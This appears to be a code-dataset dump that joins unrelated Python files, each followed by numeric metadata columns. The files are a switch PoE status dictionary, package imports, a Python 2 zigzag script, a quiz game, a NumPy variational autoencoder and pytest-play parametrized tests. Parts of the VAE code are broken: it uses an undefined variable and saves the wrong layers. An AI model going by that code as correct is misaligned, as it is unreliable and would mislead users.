"TenGigabitEthernet7/0/47": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
"TenGigabitEthernet7/0/48": {
"admin_state": "auto",
"type": "n/a",
"operating_state": "off",
"allocated_power": 0.0,
"utilized_power": 0.0,
"class": "n/a",
"device": "",
},
},
"total": {
"type": 33,
"operating_state": "on",
"allocated_power": 2302.8,
"utilized_power": 258.0,
},
}
| 31.719101
| 79
| 0.389798
| 1,229
| 14,115
| 4.317331
| 0.067535
| 0.129288
| 0.126649
| 0.162835
| 0.95213
| 0.946476
| 0.940822
| 0.905013
| 0.897663
| 0.897663
| 0
| 0.062067
| 0.437265
| 14,115
| 444
| 80
| 31.790541
| 0.605942
| 0
| 0
| 0.742664
| 0
| 0
| 0.398098
| 0.083614
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a20fbfe5596c3849764201f24c2cdd1245762b7c
| 126
|
py
|
Python
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 22
|
2015-03-02T21:38:33.000Z
|
2021-05-09T11:30:41.000Z
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 16
|
2015-03-01T23:11:49.000Z
|
2019-08-08T03:18:30.000Z
|
fits2hdf/__init__.py
|
telegraphic/fits2hdf
|
a5d66d104fdc70d67c2dac8103b70e5fe3bb9a01
|
[
"MIT"
] | 11
|
2015-03-26T14:50:33.000Z
|
2021-12-11T13:21:12.000Z
|
from __future__ import absolute_import
from . import io
from . import idi
from . import pyhdfits
from . import pyhdfits as pf
| 21
| 38
| 0.793651
| 19
| 126
| 5
| 0.473684
| 0.421053
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174603
| 126
| 5
| 39
| 25.2
| 0.913462
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bf5b8ee8902c0fb2f57c42e655897137daa0c6c7
| 870
|
py
|
Python
|
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
storm/dp_zigzag.py
|
italo-batista/problems-solving
|
f83ad34f0abebd52925c4020635556f20743ba06
|
[
"MIT"
] | null | null | null |
n = input()
numbers = map(int, raw_input().split(","))
dp = [0] * (n)
for i in range(n):
if i == 0:
dp[i] = 1
lastDiffIsPositive = True
else:
prev = numbers[i-1]
curr = numbers[i]
diff = prev - curr
if (diff >= 0 and not lastDiffIsPositive) or (diff < 0 and lastDiffIsPositive):
dp[i] = dp[i-1] + 1
else:
dp[i] = dp[i-1]
lastDiffIsPositive = (diff >= 0)
print dp[-1]
#n = input()
#numbers = map(int, raw_input().split(","))
#dp = [0] * (n)
#for i in range(n):
#if i == 0:
#lastDiffIsPositive = True
#else:
#prev = numbers[i-1]
#curr = numbers[i]
#diff = prev - curr
#if (diff >= 0 and not lastDiffIsPositive) or (diff < 0 and lastDiffIsPositive):
#dp[i] = dp[i-1] + 1
#else:
#dp[i] = dp[i-1]
#lastDiffIsPositive = (diff >= 0)
#print dp[-1]
| 11.447368
| 82
| 0.521839
| 125
| 870
| 3.616
| 0.2
| 0.059735
| 0.044248
| 0.053097
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0.99115
| 0
| 0.034483
| 0.3
| 870
| 75
| 83
| 11.6
| 0.707718
| 0.397701
| 0
| 0.117647
| 0
| 0
| 0.001972
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.058824
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bfd2cf24a3fcc8006422bda9ef9b8446169be37f
| 1,942
|
py
|
Python
|
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
Modos.py
|
David-Marinho/quiz-game-em-python
|
d99c76e2104835e615075d14b28dc66efa7145bc
|
[
"MIT"
] | null | null | null |
from random import *
from design import *
def modo1(lista_jogadores, perguntas):
quant = int(input('quantas perguntas nessa rodada? '))
vencedores = list()
shuffle(perguntas)
for vez in range(quant):
pergunta = perguntas.pop(0)
pergunta_escolhida = pergunta['p']
resposta = pergunta['r']
titulo(pergunta_escolhida)
for player in lista_jogadores:
player.resp = str(input(f'Jogador(a) {player.nome}, digite sua resposta: '))
if player.resp == resposta:
player.add_pontos()
vencedores.append(player.nome)
print('Jogadores que acertaram: ', end='')
for jogadores in vencedores:
print(f'||{jogadores}|| ', end='')
print()
vencedores.clear()
pergunta.clear()
tela_resultado()
for jogador in lista_jogadores:
print(f'{jogador.nome} ----- {jogador.pontos}')
def modo2(lista_jogadores, perguntas):
quant = int(input('quantos pontos maximos nessa rodada? '))
vencedores = list()
shuffle(perguntas)
while True:
pergunta = perguntas.pop(0)
pergunta_escolhida = pergunta['p']
resposta = pergunta['r']
titulo(pergunta_escolhida)
for player in lista_jogadores:
player.resp = str(input(f'Jogador(a) {player.nome}, digite sua resposta: '))
if player.resp == resposta:
player.add_pontos()
vencedores.append(player.nome)
if any(player.pontos == quant for player in lista_jogadores):
break
print('Jogadores que acertaram: ', end='')
for jogadores in vencedores:
print(f'||{jogadores}|| ', end='')
print()
vencedores.clear()
pergunta.clear()
tela_resultado()
for jogador in lista_jogadores:
print(f'{jogador.nome} ----- {jogador.pontos}')
| 27.352113
| 88
| 0.582904
| 203
| 1,942
| 5.502463
| 0.280788
| 0.087735
| 0.07162
| 0.042972
| 0.876455
| 0.854073
| 0.716204
| 0.716204
| 0.716204
| 0.716204
| 0
| 0.002933
| 0.297631
| 1,942
| 70
| 89
| 27.742857
| 0.815982
| 0
| 0
| 0.8
| 0
| 0
| 0.166323
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04
| false
| 0
| 0.04
| 0
| 0.08
| 0.16
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
44b2358c5a849bd0412d24bac236188540c77ee3
| 46
|
py
|
Python
|
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
imports/twofiles/for_import.py
|
suroegin-learning/learn-python
|
be5bda86add0dcd6f2fd3db737bb7d0d3ec5f853
|
[
"MIT"
] | null | null | null |
def x(y):
print(y, "from for import file")
| 23
| 36
| 0.608696
| 9
| 46
| 3.111111
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.217391
| 46
| 2
| 36
| 23
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0.425532
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0.5
| 0
| 1
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
44dde7c61de217397c734002e1ecd6d90e443d7f
| 45
|
py
|
Python
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 12
|
2020-02-18T17:47:57.000Z
|
2021-07-13T10:23:40.000Z
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 7
|
2020-02-25T12:14:11.000Z
|
2020-12-01T08:14:58.000Z
|
flake8_intsights/__init__.py
|
Intsights/flake8-intsights
|
b3785a3be855e05090641696e0648486107dba72
|
[
"MIT"
] | 1
|
2020-07-01T15:49:28.000Z
|
2020-07-01T15:49:28.000Z
|
from . import checkers
from . import checker
| 15
| 22
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 45
| 2
| 23
| 22.5
| 0.945946
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
44ea42b5965b42da416f8bf520137370f5f9438d
| 187
|
py
|
Python
|
teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | 8
|
2020-12-29T17:25:45.000Z
|
2022-03-25T10:53:20.000Z
|
teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | null | null | null |
teamgrid/envs/__init__.py
|
mila-iqia/teamgrid
|
7a6f0bf5499875a71a0e87bf5b6ce638b5587f70
|
[
"BSD-3-Clause"
] | 1
|
2022-01-13T07:08:02.000Z
|
2022-01-13T07:08:02.000Z
|
from teamgrid.envs.fourrooms import *
from teamgrid.envs.switch import *
from teamgrid.envs.dualswitch import *
from teamgrid.envs.dualdoors import *
from teamgrid.envs.doorball import *
| 31.166667
| 38
| 0.812834
| 25
| 187
| 6.08
| 0.36
| 0.394737
| 0.526316
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106952
| 187
| 5
| 39
| 37.4
| 0.91018
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
44ec0d88c8ce7078f663421f87772178e286ae04
| 13,458
|
py
|
Python
|
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
vae.py
|
anhtu/VariationalAutoEncoder
|
fc3c520f848205d229254afa78c42368c69121e9
|
[
"MIT"
] | null | null | null |
import numpy as np
from nn import *
class BerVAE:
"""Bernoulli VAE used for binary data"""
def __init__(self, params):
self.__dict__.update(**params)
self.num_output = self.num_input
num_input, num_hidden, dropout, num_latent, num_output = self.num_input, self.num_hidden, self.dropout, self.num_latent, self.num_output
# encoder
self.en_hidden = LayerFactory.build(self.hidden_activ, (num_input, num_hidden, dropout)) # W1, b1
self.en_latent_mu = LayerFactory.build("identity", (num_hidden, num_latent, dropout)) # W2, b2
self.en_latent_sigma = LayerFactory.build("exp", (num_hidden, num_latent, 1.)) # W3, b3
# decoder
self.de_hidden = LayerFactory.build(self.hidden_activ, (num_latent, num_hidden, dropout)) # W4, b4
self.de_out_mu = LayerFactory.build(self.output_activ, (num_hidden, num_output, 1.)) # W5, b5
def __call__(self, X_batch, epsilon=None):
"""
Perform the forward pass
Inputs:
- X_batch: A numpy array of shape (num_input, mini_batch) represents the batch training data
- dropout: (boolean) Whether to activate dropout during forward pass
- epsilon: A numpy array of shape (num_latent, 1) represents a sample from Standard Normal distribution
Returns:
- loss: (scalar) Value of loss function
"""
num_latent = self.num_latent
eps = 1e-12
# encoder
h_en = self.en_hidden(X_batch)
z_mu = self.en_latent_mu(h_en)
z_sigma2 = self.en_latent_sigma(h_en)
# we sample from the posterior q(z|x)
if epsilon is None: epsilon = np.random.normal(size=num_latent).reshape(num_latent, 1)
z_samples = z_mu + np.sqrt(z_sigma2) * epsilon
# decoder
h_de = self.de_hidden(z_samples)
x_mu = self.de_out_mu(h_de)
# use the z_samples to estimate the ELBO
neg_log_bernoulli = lambda x, p: -x*np.log(p + eps) - (1. - x)*np.log(1. - p + eps)
neg_kl_divergence = 0.5*(-1. - np.log(z_sigma2) + z_mu**2 + z_sigma2)
# minimize this loss instead of maximizing
loss = neg_kl_divergence.sum() + neg_log_bernoulli(X_batch, x_mu).sum()
self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples = h_en, z_mu, z_sigma2, epsilon, z_samples
self.h_de, self.x_mu, self.X_batch = h_de, x_mu, X_batch
return loss
def generate_data(self, samples=None):
# sample from the prior
z_samples = np.random.normal(size=self.num_latent).reshape(self.num_latent, 1) if samples is None else samples
# forward to the output
h_de = self.de_hidden.predict(z_samples)
x_mu = self.de_out_mu.predict(h_de)
return x_mu
def back_prop(self):
eps = 1e-12
h_en, z_mu, z_sigma2, epsilon, z_samples = self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples
h_de, x_mu, X_batch = self.h_de, self.x_mu, self.X_batch
dloss_dxm = -X_batch/(x_mu + eps) + (1. - X_batch)/(1. - x_mu + eps)
dloss_dhde, dloss_dW5, dloss_db5 = self.de_out_mu.back_prop(dloss_dxm)
dloss_dz_samples, dloss_dW4, dloss_db4 = self.de_hidden.back_prop(dloss_dhde)
# loss to zm, zs2
dloss_dzm1 = z_mu
dloss_dzs1 = -0.5/z_sigma2 + 0.5
# propagate from z_samples
dz_samples_dzm2 = 1.
dz_samples_dzs2 = 0.5*epsilon * (z_sigma2)**-0.5
dloss_dzm2 = dloss_dz_samples * dz_samples_dzm2
dloss_dzs2 = dloss_dz_samples * dz_samples_dzs2
dloss_dzm = dloss_dzm1 + dloss_dzm2
dloss_dzs = dloss_dzs1 + dloss_dzs2
dloss_dhen1, dloss_dW2, dloss_db2 = self.en_latent_mu.back_prop(dloss_dzm)
dloss_dhen2, dloss_dW3, dloss_db3 = self.en_latent_sigma.back_prop(dloss_dzs)
dloss_dhen = dloss_dhen1 + dloss_dhen2
_, dloss_dW1, dloss_db1 = self.en_hidden.back_prop(dloss_dhen)
return dloss_dW5, dloss_db5, dloss_dW4, dloss_db4, dloss_dW3, dloss_db3, dloss_dW2, dloss_db2, dloss_dW1, dloss_db1
def train(self, X, batch_size=100, num_iter=1000, step_size=0.001, print_every=100):
"""
Perform training procedure using Adagrad
"""
W5, b5, W4, b4 = self.de_out_mu.W, self.de_out_mu.b, self.de_hidden.W, self.de_hidden.b
W3, b3, W2, b2, W1, b1 = self.en_latent_sigma.W, self.en_latent_sigma.b, self.en_latent_mu.W, self.en_latent_mu.b, self.en_hidden.W, self.en_hidden.b
eps = 1e-12
num_train = X.shape[1]
cache = {"W5": 0., "W4": 0., "W3": 0., "W2": 0., "W1": 0., "b5": 0., "b4": 0., "b3": 0., "b2": 0., "b1": 0.}
for i in range(num_iter+1):
# create mini-batch
ix_batch = np.random.choice(range(num_train), size=batch_size, replace=False)
X_batch = X[:, ix_batch]
loss = self.__call__(X_batch)
dW5, db5, dW4, db4, dW3, db3, dW2, db2, dW1, db1 = self.back_prop()
# Adagrad update
cache["W5"] += dW5**2
cache["W4"] += dW4**2
cache["W3"] += dW3**2
cache["W2"] += dW2**2
cache["W1"] += dW1**2
cache["b5"] += db5**2
cache["b4"] += db4**2
cache["b3"] += db3**2
cache["b2"] += db2**2
cache["b1"] += db1**2
def ratio_weight_update(dW, W, W_name):
param_scale = np.linalg.norm(W.ravel())
update = step_size * dW / (np.sqrt(cache[W_name]) + eps)
update_scale = np.linalg.norm(update.ravel())
return update_scale / param_scale
ratio_W1 = ratio_weight_update(dW1, W1, "W1")
W5 -= step_size * dW5 / (np.sqrt(cache["W5"]) + eps)
W4 -= step_size * dW4 / (np.sqrt(cache["W4"]) + eps)
W3 -= step_size * dW3 / (np.sqrt(cache["W3"]) + eps)
W2 -= step_size * dW2 / (np.sqrt(cache["W2"]) + eps)
W1 -= step_size * dW1 / (np.sqrt(cache["W1"]) + eps)
b5 -= step_size * db5 / (np.sqrt(cache["b5"]) + eps)
b4 -= step_size * db4 / (np.sqrt(cache["b4"]) + eps)
b3 -= step_size * db3 / (np.sqrt(cache["b3"]) + eps)
b2 -= step_size * db2 / (np.sqrt(cache["b2"]) + eps)
b1 -= step_size * db1 / (np.sqrt(cache["b1"]) + eps)
if i % print_every == 0:
print("Iter: " + str(i) + " - Mini batch loss: " + str(loss))
print("Ratio upd W1: " + str(ratio_W1))
def save_model(self, pk_file):
self.saved_attr = ["num_input", "num_latent", "num_output", "dropout"]
self.layers = ["en_hidden", "en_latent_mu", "en_latent_sigma", "de_hidden", "de_out_mu"]
saved_data = {}
for attr in self.saved_attr:
saved_data[attr] = self.__dict__[attr]
for layer_name in self.layers:
layer = self.__dict__[attr]
name = layer_name
saved_data[name + "_W"] = layer.W
saved_data[name + "_b"] = layer.b
with open(pk_file, 'wb') as f:
pk.dump(saved_data, f, pk.HIGHEST_PROTOCOL)
class GauVAE:
"""Gaussian VAE used for real-valued data"""
def __init__(self, params):
self.__dict__.update(**params)
self.num_output = self.num_input
num_input, num_hidden, dropout, num_latent = self.num_input, self.num_hidden, self.dropout, self.num_latent
# encoder
self.en_hidden = LayerFactory.build(self.hidden_activ, num_input, num_output, dropout) # W1, b1
self.en_latent_mu = LayerFactory.build("identity", num_hidden, num_latent, dropout) # W2, b2
self.en_latent_sigma = LayerFactory.build("exp", num_hidden, num_latent, 1.) # W3, b3
# decoder
self.de_hidden = LayerFactory.build(self.hidden_activ, num_latent, num_hidden, dropout) # W4, b4
self.de_out_mu = LayerFactory.build("identity", num_hidden, self.num_output, dropout) # W5, b5
self.de_out_sigma = LayerFactory.build("exp", num_hidden, self.num_output, 1.) # W6, b6
def __call__(self, X_batch, epsilon=None):
"""
Perform the forward pass
Inputs:
- X_batch: A numpy array of shape (num_input, mini_batch) represents the batch training data
- dropout: (boolean) Whether to activate dropout during forward pass
- epsilon: A numpy array of shape (num_latent, 1) represents a sample from Standard Normal distribution
Returns:
- loss: (scalar) Value of loss function
"""
num_latent = self.num_latent
eps = 1e-12
# encoder
h_en = self.en_hidden(X_batch)
z_mu = self.en_latent_mu(h_en)
z_sigma2 = self.en_latent_sigma(h_en)
# we sample from the posterior q(z|x)
if epsilon is None: epsilon = np.random.normal(size=num_latent).reshape(num_latent, 1)
z_samples = z_mu + np.sqrt(z_sigma2) * epsilon
# decoder
h_de = self.de_hidden(z_samples)
x_mu = self.de_out_mu(h_de)
x_sigma2 = self.de_out_sigma(h_de)
# use the z_samples to estimate the ELBO
neg_log_gaussian = lambda x, m, s2: 0.5*np.log(2.*np.pi*s2) + (x - m)**2 / (2.*s2)
neg_kl_divergence = 0.5*(-1. - np.log(z_sigma2) + z_mu**2 + z_sigma2)
# minimize this loss instead of maximizing
loss = neg_kl_divergence.sum() + neg_log_gaussian(X_batch, x_mu, x_sigma2).sum()
self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples = h_en, z_mu, z_sigma2, epsilon, z_samples
self.h_de, self.x_mu, self.x_sigma2, self.X_batch = h_de, x_mu, x_sigma2, X_batch
return loss
def generate_data(self, samples=None):
# sample from the prior
z_samples = np.random.normal(size=self.num_latent).reshape(self.num_latent, 1) if samples is None else samples
# forward to the output
h_de = self.de_hidden.predict(z_samples)
x_mu = self.de_out_mu.predict(h_de)
return x_mu
def back_prop(self):
eps = 1e-12
h_en, z_mu, z_sigma2, epsilon, z_samples = self.h_en, self.z_mu, self.z_sigma2, self.epsilon, self.z_samples
h_de, x_mu, x_sigma2, X_batch = self.h_de, self.x_mu, self.x_sigma2, self.X_batch
dloss_dxm = (x_mu - X_batch) / x_sigma2
dloss_dxs = 0.5/x_sigma2 - 0.5*(X_batch - x_mu)**2 / x_sigma2**2
dloss_dhde1, dloss_dW5, dloss_db5 = self.de_out_mu.back_prop(dloss_dxm)
dloss_dhde2, dloss_dW6, dloss_db6 = self.de_out_sigma.back_prop(dloss_dxs)
dloss_dhde = dloss_dhde1 + dloss_dhde2
dloss_dz_samples, dloss_dW4, dloss_db4 = self.de_hidden.back_prop(dloss_dhde)
# loss to zm, zs2
dloss_dzm1 = z_mu
dloss_dzs1 = -0.5/z_sigma2 + 0.5
# propagate from z_samples
dz_samples_dzm2 = 1.
dz_samples_dzs2 = 0.5*epsilon * (z_sigma2)**-0.5
dloss_dzm2 = dloss_dz_samples * dz_samples_dzm2
dloss_dzs2 = dloss_dz_samples * dz_samples_dzs2
dloss_dzm = dloss_dzm1 + dloss_dzm2
dloss_dzs = dloss_dzs1 + dloss_dzs2
dloss_dhen1, dloss_dW2, dloss_db2 = self.en_latent_mu.back_prop(dloss_dzm)
dloss_dhen2, dloss_dW3, dloss_db3 = self.en_latent_sigma.back_prop(dloss_dzs)
dloss_dhen = dloss_dhen1 + dloss_dhen2
_, dloss_dW1, dloss_db1 = self.en_hidden.back_prop(dloss_dhen)
return dloss_dW6, dloss_db6, dloss_dW5, dloss_db5, dloss_dW4, dloss_db4, dloss_dW3, dloss_db3, dloss_dW2, dloss_db2, dloss_dW1, dloss_db1
def train(self, X, batch_size=100, num_iter=1000, step_size=0.001, print_every=100):
"""
Perform training procedure using Adagrad
"""
W6, b6, W5, b5, W4, b4 = self.de_out_sigma.W, self.de_out_sigma.b, self.de_out_mu.W, self.de_out_mu.b, self.de_hidden.W, self.de_hidden.b
W3, b3, W2, b2, W1, b1 = self.en_latent_sigma.W, self.en_latent_sigma.b, self.en_latent_mu.W, self.en_latent_mu.b, self.en_hidden.W, self.en_hidden.b
eps = 1e-12
num_train = X.shape[1]
cache = {"W6": 0., "b6": 0., "W5": 0., "W4": 0., "W3": 0., "W2": 0., "W1": 0., "b5": 0., "b4": 0., "b3": 0., "b2": 0., "b1": 0.}
for i in range(num_iter+1):
# create mini-batch
ix_batch = np.random.choice(range(num_train), size=batch_size, replace=False)
X_batch = X[:, ix_batch]
loss = self.__call__(X_batch)
dW6, db6, dW5, db5, dW4, db4, dW3, db3, dW2, db2, dW1, db1 = self.back_prop()
# Adagrad update
cache["W6"] += dW6**2
cache["W5"] += dW5**2
cache["W4"] += dW4**2
cache["W3"] += dW3**2
cache["W2"] += dW2**2
cache["W1"] += dW1**2
cache["b6"] += db6**2
cache["b5"] += db5**2
cache["b4"] += db4**2
cache["b3"] += db3**2
cache["b2"] += db2**2
cache["b1"] += db1**2
W6 -= step_size * dW6 / (np.sqrt(cache["W6"]) + eps)
W5 -= step_size * dW5 / (np.sqrt(cache["W5"]) + eps)
W4 -= step_size * dW4 / (np.sqrt(cache["W4"]) + eps)
W3 -= step_size * dW3 / (np.sqrt(cache["W3"]) + eps)
W2 -= step_size * dW2 / (np.sqrt(cache["W2"]) + eps)
W1 -= step_size * dW1 / (np.sqrt(cache["W1"]) + eps)
b6 -= step_size * db6 / (np.sqrt(cache["b6"]) + eps)
b5 -= step_size * db5 / (np.sqrt(cache["b5"]) + eps)
b4 -= step_size * db4 / (np.sqrt(cache["b4"]) + eps)
b3 -= step_size * db3 / (np.sqrt(cache["b3"]) + eps)
b2 -= step_size * db2 / (np.sqrt(cache["b2"]) + eps)
b1 -= step_size * db1 / (np.sqrt(cache["b1"]) + eps)
if i % print_every == 0: print("Iter: " + str(i) + " - Mini batch loss: " + str(loss))
def save_model(self, pk_file):
self.saved_attr = ["num_input", "num_latent", "num_output", "dropout"]
self.layers = ["en_hidden", "en_latent_mu", "en_latent_sigma", "de_hidden", "de_out_mu", "de_out_sigma"]
saved_data = {}
for attr in self.saved_attr:
saved_data[attr] = self.__dict__[attr]
for layer_name in self.layers:
layer = self.__dict__[attr]
name = layer_name
saved_data[name + "_W"] = layer.W
saved_data[name + "_b"] = layer.b
with open(pk_file, 'wb') as f:
pk.dump(saved_data, f, pk.HIGHEST_PROTOCOL)
# [TODO] restore model
| 39.816568
| 153
| 0.646084
| 2,203
| 13,458
| 3.667726
| 0.095325
| 0.022277
| 0.031312
| 0.016337
| 0.89505
| 0.889975
| 0.881436
| 0.878342
| 0.875248
| 0.87401
| 0
| 0.043851
| 0.212067
| 13,458
| 337
| 154
| 39.934718
| 0.718125
| 0.110418
| 0
| 0.729858
| 0
| 0
| 0.036987
| 0
| 0
| 0
| 0
| 0.002967
| 0
| 1
| 0.061611
| false
| 0
| 0.009479
| 0
| 0.113744
| 0.028436
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7839ac281a99d02e6d931cb377eb81f5b2103526
| 2,654
|
py
|
Python
|
tests/test_parametrized.py
|
VeerendraNathLukkani/pytest_test
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 51
|
2018-04-26T09:02:38.000Z
|
2021-11-21T10:57:32.000Z
|
tests/test_parametrized.py
|
VeerendraNathLukkani/pytest_test
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 39
|
2017-12-20T14:27:33.000Z
|
2018-04-05T22:45:12.000Z
|
tests/test_parametrized.py
|
tierratelematics/pytest-play
|
c39a1a7e74d90aebeb30797a61d0e491942557e8
|
[
"Apache-2.0"
] | 5
|
2018-06-30T15:51:39.000Z
|
2020-04-13T19:31:25.000Z
|
def test_autoexecute_yml_parametrized_data(testdir):
yml_file = testdir.makefile(".yml", """
---
test_data:
- username: foo
age: 21
- username: bar
age: 22
---
- provider: python
type: assert
expression: variables['username'] in ('foo', 'bar',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_uppercase(testdir):
yml_file = testdir.makefile(".yml", """
---
test_data:
- Username: Foo
- Username: Bar
---
- provider: python
type: assert
expression: variables['Username'] in ('Foo', 'Bar',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_json(testdir):
""" json syntax """
yml_file = testdir.makefile(".yml", """
---
test_data:
[{"username": "foo"},
{"username": "bar"}]
---
- provider: python
type: assert
expression: variables['username'] in ('foo', 'bar',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_autoexecute_yml_parametrized_data_passed_failed(testdir):
yml_file = testdir.makefile(".yml", """
---
test_data:
- username: foo
- username: barZ
---
- provider: python
type: assert
expression: variables['username'] in ('foo', 'bar',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest()
result.assert_outcomes(passed=1, failed=1)
def test_autoexecute_yml_parametrized_data_passed_keyword(testdir):
yml_file = testdir.makefile(".yml", """
---
test_data:
- username: foo
- username: barZ
---
- provider: python
type: assert
expression: variables['username'] in ('foo', 'bar',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest('-k test_data0')
result.assert_outcomes(passed=1, failed=0)
def test_autoexecute_yml_parametrized_data_a(testdir):
yml_file = testdir.makefile(".yml", """
---
test_data:
- username: foò
- username: bàr
---
- provider: python
type: assert
expression: variables['username'] in ('foò', 'bàr',)
""")
assert yml_file.basename.startswith('test_')
assert yml_file.basename.endswith('.yml')
result = testdir.runpytest()
result.assert_outcomes(passed=2)
| 22.87931
| 67
| 0.677091
